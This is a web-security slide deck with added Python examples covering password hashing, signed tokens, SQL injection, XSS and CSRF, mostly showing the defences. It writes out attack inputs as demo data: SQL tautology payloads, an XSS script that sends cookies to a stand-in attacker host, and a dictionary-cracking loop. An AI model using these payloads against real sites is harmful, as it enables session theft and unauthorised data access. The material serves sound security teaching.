It's worth a shot - PowerPoint PPT Presentation

SLIDE 1

It’s worth a shot.

https://youtu.be/7W5au-IJUEc

SLIDE 2

Approach

  1. What created the vulnerability.
  2. How the vulnerability is exploited.
  3. How to protect yourself.

SLIDE 3

Web 2.0

  • Servers send HTML and JS to clients
  • Clients execute JS that changes the DOM and makes requests back to the server

What could possibly go wrong?!

Diagram: Server sends HTML, CSS, JS to the client (Bingo)

SLIDE 4

Authentication

  • Usually requires a username and password
  • What kinds of passwords are acceptable?
  • How should we send the username and password?
  • How should we store and validate the username and password?

Username and password… easy.

SLIDE 5

Authentication

  • Don’t store passwords in plaintext
  • Hash!

SLIDE 6

Authentication

Password Storage

Diagram (salt+hash): the password and a random salt go into the hash function; the salt and the resulting hash are what gets stored.

SLIDE 7

Authentication

Password Validation

Diagram (salt+hash): the stored salt and the password to check go into the same hash function; the result is compared with the stored hash (match?).

Are hashed passwords uncrackable? No!
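The storage and validation flow of slides 6 and 7, as an added example that is not part of the slides. It uses PBKDF2-HMAC-SHA256 from the Python standard library as the slow hash function (the slides do not name one; bcrypt, scrypt or Argon2 are equally valid choices), a 16-byte random salt per user, and a constant-time comparison on validation. The `crack` function shows the point of the last question on slide 7: a salted hash is not uncrackable, an attacker who steals the salt and hash simply tries candidate passwords through the same function, so only the password's strength and the cost per guess protect the user. The work factor, the sample passwords and the word list are assumptions for the demo.

```python
import hashlib
import hmac
import os
from typing import List, Optional, Tuple

# Assumed work factor for PBKDF2-HMAC-SHA256; tune so one hash costs
# roughly 100 ms on the server. Higher means slower guessing for attackers too.
ITERATIONS = 600_000


def hash_password(password: str, salt: Optional[bytes] = None,
                  iterations: int = ITERATIONS) -> Tuple[bytes, bytes, int]:
    """Return (salt, hash, iterations) to store for the user.

    A fresh random salt per user means two users with the same password get
    different hashes, and a precomputed table for unsalted hashes is useless.
    """
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return salt, digest, iterations


def verify_password(password: str, salt: bytes, stored: bytes, iterations: int) -> bool:
    """Recompute the hash with the stored salt and compare in constant time,
    so the comparison itself leaks nothing about how many bytes matched."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return hmac.compare_digest(candidate, stored)


def crack(salt: bytes, stored: bytes, iterations: int, wordlist: List[str]) -> Optional[str]:
    """Offline guessing by an attacker who stole (salt, hash, iterations).

    The salt does not stop this: it only forces the attacker to work per user
    instead of per hash value. Each guess costs one PBKDF2 run, which is why
    the iteration count matters.
    """
    for guess in wordlist:
        if verify_password(guess, salt, stored, iterations):
            return guess
    return None


if __name__ == "__main__":
    # Constructed demo values; the low iteration count keeps the demo quick.
    salt, digest, its = hash_password("password123", iterations=2_000)
    print("valid login:", verify_password("password123", salt, digest, its))
    print("wrong password:", verify_password("letmein", salt, digest, its))
    print("cracked as:", crack(salt, digest, its, ["letmein", "qwerty", "password123"]))
```

The stored triple (salt, hash, iteration count) is all the server keeps; storing the iteration count alongside lets you raise the work factor later and rehash users on their next successful login.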

SLIDE 8

Authentication

  • We're hashing passwords, so do we need encryption?
  • We sure do!

Encryption

Diagram: Bingo sends an HTTP POST with username and password to the Server, which salts and hashes it; Bongo, sitting on the unencrypted HTTP path, reads the password in transit ("Thanks!").

SLIDE 9

Authentication

  • We don't want people to have to constantly log in
  • We need to give the client a token that they can use to prove that they have authenticated successfully

Tokens

Diagram: Bingo sends an HTTPS POST with username and password to the Server; the Server answers with a token.

SLIDE 10

Authentication

  • Must identify the user
  • Must be signed with the server's private key (a key only the server holds), so that a client cannot forge or alter it

Tokens

Diagram: Bingo presents the token to the Server: OK. Bongo presents a fake token: nope.
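The token exchange of slides 9 and 10, as an added example that is not from the slides. It issues a token that names the user and carries an expiry, tags it with HMAC-SHA256 under a key only the server holds, and refuses anything whose tag does not verify. HMAC is a symmetric scheme; an asymmetric signature (RSA or ECDSA, as in JWT's RS256/ES256) fits the slide's "private key" wording more literally and lets other services verify with the public key, but the shape of issue/verify is the same. The key, the claim names and `forge_token` (what Bongo attempts on slide 10) are assumptions for the demo.

```python
import base64
import binascii
import hashlib
import hmac
import json
import time
from typing import Optional

# Constructed demo key; a real server loads it from a secret store and never
# sends it to clients.
SERVER_KEY = b"demo-only-server-key-change-me"


def _b64(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_token(user_id: str, key: bytes, ttl_seconds: int = 3600,
                now: Optional[int] = None) -> str:
    """token = base64(payload) '.' base64(HMAC-SHA256(key, payload)).

    The payload identifies the user ("sub") and carries an expiry ("exp");
    the tag is what makes it unforgeable without the key.
    """
    now = int(time.time()) if now is None else now
    payload = json.dumps({"sub": user_id, "exp": now + ttl_seconds},
                         separators=(",", ":")).encode("utf-8")
    tag = hmac.new(key, payload, hashlib.sha256).digest()
    return _b64(payload) + "." + _b64(tag)


def verify_token(token: str, key: bytes, now: Optional[int] = None) -> Optional[str]:
    """Return the user id if the tag verifies and the token is unexpired, else None.

    The tag is checked before the payload is parsed, so untrusted bytes never
    reach json.loads, and the comparison is constant time.
    """
    try:
        payload_b64, tag_b64 = token.split(".")
        payload = _unb64(payload_b64)
        tag = _unb64(tag_b64)
    except (ValueError, binascii.Error):
        return None
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None
    claims = json.loads(payload)
    now = int(time.time()) if now is None else now
    if claims.get("exp", 0) <= now:
        return None
    return claims.get("sub")


def forge_token(token: str, new_user: str) -> str:
    """Bongo's attempt: keep the server's tag, rewrite the user id."""
    payload_b64, tag_b64 = token.split(".")
    claims = json.loads(_unb64(payload_b64))
    claims["sub"] = new_user
    forged_payload = json.dumps(claims, separators=(",", ":")).encode("utf-8")
    return _b64(forged_payload) + "." + tag_b64


if __name__ == "__main__":
    tok = issue_token("bingo", SERVER_KEY)
    print("bingo's token verifies as:", verify_token(tok, SERVER_KEY))
    print("forged token verifies as:", verify_token(forge_token(tok, "admin"), SERVER_KEY))
```

Because the tag covers the whole payload, changing any claim (the user id, the expiry) invalidates it; the server never needs to store the token, only the key.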

SLIDE 11

SQL Injection

  • What happens when name is `" or "" = "`? (The WHERE clause becomes `name = "" or "" = ""`, which is true for every row.)

SLIDE 12

SQL Injection

Solving the problem.

  • Blacklist certain characters
  • Whitelist certain characters
  • Use prepared statements
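The injection of slide 11 and the three defences of slide 12 side by side, as an added example that is not from the slides. It builds a throwaway SQLite table, runs the tautology payload through a concatenated query, through a quote-stripping blacklist, and through a prepared statement. The payload is written with single quotes because that is the string delimiter SQLite uses; in dialects where `"` delimits strings the slide's `" or "" = "` form does the same thing. The numeric payload `1 or 1 = 1` shows why a blacklist of quote characters is not a fix: a numeric column needs no quote at all. The table, its rows and the function names are constructed for the demo.

```python
import sqlite3
from typing import List, Tuple

# Constructed sample data; none of these users are real.
SAMPLE_USERS = [
    (1, "bingo", "bingo@example.com"),
    (2, "bongo", "bongo@example.com"),
    (3, "admin", "admin@example.com"),
]

# Slide 11's payload in SQLite's single-quote form, plus a quote-free variant.
TAUTOLOGY = "' or '' = '"
NUMERIC_TAUTOLOGY = "1 or 1 = 1"


def make_db() -> sqlite3.Connection:
    """In-memory database so the example runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, name: str) -> List[Tuple]:
    """String concatenation: the input becomes part of the SQL grammar.
    With TAUTOLOGY the clause reads  username = '' or '' = ''  -> every row."""
    query = "SELECT id, username, email FROM users WHERE username = '" + name + "'"
    return conn.execute(query).fetchall()


def lookup_blacklist(conn: sqlite3.Connection, id_text: str) -> List[Tuple]:
    """Blacklist defence: strip quote characters, then concatenate.
    Useless for a numeric column, where  id = 1 or 1 = 1  needs no quotes."""
    cleaned = id_text.replace("'", "").replace('"', "")
    query = "SELECT id, username, email FROM users WHERE id = " + cleaned
    return conn.execute(query).fetchall()


def lookup_prepared(conn: sqlite3.Connection, name: str) -> List[Tuple]:
    """Prepared statement: the value travels separately from the query text,
    so it can only ever be compared as data, never parsed as SQL."""
    return conn.execute(
        "SELECT id, username, email FROM users WHERE username = ?", (name,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("concatenated:", lookup_vulnerable(db, TAUTOLOGY))        # all three rows
    print("blacklisted: ", lookup_blacklist(db, NUMERIC_TAUTOLOGY))  # all three rows
    print("prepared:    ", lookup_prepared(db, TAUTOLOGY))           # [] (no such user)
```

A whitelist (accept only `[A-Za-z0-9_]` for a username, say) is a reasonable extra check, but the prepared statement is the defence that works regardless of what the column type or the dialect's quoting rules are.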

SLIDE 13

Cross-site Scripting (XSS)

  • Stored XSS
  • Reflected XSS

Just stick to the script.

Diagram: a page on www.bongo.com says "Check this out!" and links to www.bank.com/profile?name=<script>... (reflected XSS: the script in the query parameter is echoed back into the bank's page).

SLIDE 14

Cross-site Scripting (XSS)

Protection.

  • Sanitize inputs
  • Escape HTML
  • Use an auto-escaping framework like React or Vue.js
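The reflected XSS of slide 13 and the first two defences of slide 14 (input whitelisting and output escaping), as an added example that is not from the slides. `render_profile_vulnerable` reflects the `name` query parameter straight into the page, which is what the `www.bank.com/profile?name=<script>...` link relies on; the escaped versions turn `<`, `>`, `&` and both quote characters into entities so the browser displays the text instead of executing it. The attribute-context pair shows why the quotes matter as much as the angle brackets. The payloads and the username rule are constructed for the demo.

```python
import html
import re
from typing import Optional

# Constructed payloads: what the link on www.bongo.com might put into
# www.bank.com/profile?name=...
SCRIPT_PAYLOAD = "<script>new Image().src='https://www.bongo.com/?c='+document.cookie</script>"
ATTRIBUTE_PAYLOAD = '" onfocus="alert(document.cookie)'


def render_profile_vulnerable(name: str) -> str:
    """Reflects the parameter into the HTML body unchanged: reflected XSS."""
    return "<h1>Welcome, " + name + "</h1>"


def render_profile_escaped(name: str) -> str:
    """Body context: escaping < > & ' and " makes the payload inert text."""
    return "<h1>Welcome, " + html.escape(name, quote=True) + "</h1>"


def render_input_vulnerable(name: str) -> str:
    """Attribute context: a stray " closes value="..." and the rest of the
    payload becomes a new attribute such as onfocus=..."""
    return '<input name="name" value="' + name + '">'


def render_input_escaped(name: str) -> str:
    """html.escape(quote=True) turns " into &quot;, so the value cannot break
    out of the attribute. This is the kind of per-context escaping an
    auto-escaping template engine does for you."""
    return '<input name="name" value="' + html.escape(name, quote=True) + '">'


# Assumed username policy for the "sanitize inputs" bullet.
USERNAME_RE = re.compile(r"[A-Za-z0-9_]{1,32}")


def validate_username(name: str) -> Optional[str]:
    """Input whitelist: accept only what a username may contain.

    A second layer, not a replacement for escaping on output: other fields
    (a bio, a comment) legitimately contain < and &, and the page still has
    to render them safely.
    """
    return name if USERNAME_RE.fullmatch(name) else None


if __name__ == "__main__":
    print(render_profile_vulnerable(SCRIPT_PAYLOAD))  # script runs in the victim's browser
    print(render_profile_escaped(SCRIPT_PAYLOAD))     # &lt;script&gt;... shown as text
    print(render_input_vulnerable(ATTRIBUTE_PAYLOAD)) # onfocus handler injected
    print(render_input_escaped(ATTRIBUTE_PAYLOAD))    # quotes neutralised
    print(validate_username(SCRIPT_PAYLOAD))          # None: rejected at the door
```

Escaping is context-specific: the HTML-body and attribute escaping above does not make a value safe inside a `<script>` block or a URL, which is the main reason the slide recommends a framework that picks the right escaping for each context automatically.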

SLIDE 15

Cookies

  • HTTP is stateless
  • Cookies are used to maintain state

    ○ Store session information
    ○ Store user preferences
    ○ Track your every move...

Just maintain state! No problem!

SLIDE 16

Cross-site Request Forgery (CSRF)

It really wasn’t me this time.

  • Your browser automatically attaches cookies to requests to the domain they came from

SLIDE 17

Cross-site Request Forgery (CSRF)

Diagram: Bingo's browser does a GET to www.bongo.com and receives malicious content; that content makes the browser send a "transfer" request to the Server with Bingo's <cookie> attached, and the Server answers OK.

SLIDE 18

Cross-site Request Forgery (CSRF)

Prevention.

  • Don't use GET to modify state
  • Hidden nonces in forms
  • Use SameSite cookies
  • Check the Origin or Referer of the request
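The four defences of slide 18 applied to the transfer request of slide 17, as an added example that is not from the slides. A per-session nonce is generated and embedded in the real form as a hidden field, the session cookie is issued with `SameSite=Lax` so the browser will not attach it to a cross-site POST started from www.bongo.com, and the server-side check refuses anything that is not a POST, does not come from the site's own origin, or does not carry the session's nonce. The site origin, the header and form field names, and the sample requests are assumptions for the demo.

```python
import hmac
import secrets
from typing import Dict
from urllib.parse import urlsplit

# Assumed origin of the protected application (the slides call it www.bank.com).
SITE_ORIGIN = "https://www.bank.com"


def new_csrf_token() -> str:
    """Per-session nonce: kept in the server-side session and put into every form."""
    return secrets.token_urlsafe(32)


def session_cookie_header(session_id: str) -> str:
    """SameSite=Lax stops the browser attaching this cookie to cross-site POSTs
    (the form on www.bongo.com); Secure and HttpOnly stop plaintext transmission
    and script access."""
    return f"Set-Cookie: session={session_id}; Secure; HttpOnly; SameSite=Lax; Path=/"


def transfer_form(csrf_token: str) -> str:
    """The legitimate form: state change behind POST, plus the hidden nonce."""
    return (
        '<form method="POST" action="/transfer">'
        f'<input type="hidden" name="csrf_token" value="{csrf_token}">'
        '<input name="to"><input name="amount">'
        '<button>Transfer</button></form>'
    )


def same_origin(headers: Dict[str, str]) -> bool:
    """Browsers send Origin on cross-site POSTs; fall back to Referer.

    With neither header present the request is refused (fail closed); some
    deployments accept it when the nonce check alone passes.
    """
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == SITE_ORIGIN


def is_transfer_allowed(method: str, headers: Dict[str, str],
                        form: Dict[str, str], session: Dict[str, str]) -> bool:
    """Apply the slide's checks to one /transfer request."""
    if method.upper() != "POST":           # never modify state on GET
        return False
    if not same_origin(headers):           # check Origin / Referer
        return False
    expected = session.get("csrf_token", "")
    submitted = form.get("csrf_token", "")
    if not expected:                       # session never got a nonce: refuse
        return False
    # hidden nonce must match, compared in constant time
    return hmac.compare_digest(submitted.encode("utf-8"), expected.encode("utf-8"))


if __name__ == "__main__":
    session = {"csrf_token": new_csrf_token()}
    print(session_cookie_header("abc123"))
    # Bingo submits the real form from the bank's own page.
    print("legitimate:", is_transfer_allowed(
        "POST", {"Origin": SITE_ORIGIN},
        {"csrf_token": session["csrf_token"], "to": "bongo", "amount": "100"}, session))
    # Bongo's page auto-submits a form to the bank; it cannot know the nonce.
    print("forged:", is_transfer_allowed(
        "POST", {"Origin": "https://www.bongo.com"},
        {"to": "bongo", "amount": "100"}, session))
```

Each check covers a gap in the others: the nonce defends browsers that ignore `SameSite`, the origin check catches a nonce that leaked through some other bug, and refusing GET keeps an `<img src=...>` on bongo.com from triggering the transfer at all.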

SLIDE 19

Honorable Mentions

  • Containers
  • Metasploit (penetration testing): www.metasploit.com
  • OWASP (web application security): www.owasp.org
  • WebGoat: github.com/WebGoat/WebGoat